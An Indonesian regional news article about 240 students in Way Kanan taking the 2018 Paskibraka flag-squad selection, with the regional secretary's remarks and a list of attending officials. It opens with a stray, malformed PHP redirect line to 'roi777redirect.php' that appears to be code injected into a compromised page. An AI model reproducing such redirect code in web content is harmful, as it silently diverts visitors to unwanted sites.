header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Seleksi Calon Paskibraka Way Kanan Diikuti 240 Siswa -
Seleksi Calon Paskibraka Way Kanan Diikuti 240 Siswa

TRANSLAMPUNG.COM,  BLAMBANGAN UMPU – Sebanyak 240 Siswa-Siswi SMA/SMK Sederajat sekabupaten Way Kanan mengikuti tes seleksi calon pasukan pengibar bendera pusaka (Paskibraka) tingkat Kabupaten Way Kanan tahun 2018. Acara Seleksi Paskibraka dibuka langsung oleh Skretaris Daerah Kabupaten (Sekdakab) Way Kanan Saipul yang digelar di Gedung Serba Guna (GSG) Pemkab setempat, Selasa (27/3).

Pasukan Pengibar Bendera Pusaka dengan tugas utamanya mengibarkan duplikat bendera pusaka dalam upacara peringatan proklamasi kemerdekaan Indonesia di 3 tempat, yakni tingkat Kabupaten/Kota (Kantor Bupati/Wali Kota), Provinsi (Kantor Gubernur), dan Nasional (Istana Merdeka).

Dari 240 jumlah Siswa/i yang mengikuti Seleksi tersebut akan dipilih sebanyak 33 siswa/i yang akan menjadi pasukan pengibar bendera pusaka tingkat kabupaten waykanan pada acara HUT Ri ke 73 di bulan Agustus mendatang.

Pada kesempatan itu Sekretaris Daerah Kabupaten Way Kanan Saipul mengatakan pemuda pemudi Kabupaten Way Kanan harus mampu tampil melanjutkan kepemimpinan bangsa adalah para pemuda dan pemudi yang cerdas, terampil, berbudi pekerti yang luhur, memiliki ilmu pengetahuan yang luas, sehat rohani dan jasmaninya, beriman dan bertaqwa kepada Allah SWT. Rukun satu sama lainnya serta memiliki semangat untuk mengabdi kepada bangsa, negara dan masyarakat.

“kesemuanya itu tentunya harus diperjuangkan sejak dini, karena selain memerlukan pengorbanan, juga memerlukan niat, tekad, semangat, dan kerja keras yang tinggi serta keuletan dan ketekunan dari para pemuda pemudi itu sendiri,  karena Indonesia adalah negara yang besar baik dari segi wilayah, jumlah penduduk, sejarah maupun budayanya,” ujar Saipul.

Turut hadir di acara itu, Staf Ahli  Bupati bidang kemasyarakatan Dan Sumber Daya  Manusia, Drs.Juanda, Asisten Bidang pemerintahan dan kesejahteraan Rakyat, Drs.Abu Kori, Kadis Kesehatan dr. Farida Aryani, Kadis Porapar, Drs. Harun Anosa, Unsur Kodim 0427/WK dan Unsur Polres Way Kanan. (Yhs/mig/hkw)

News Reporter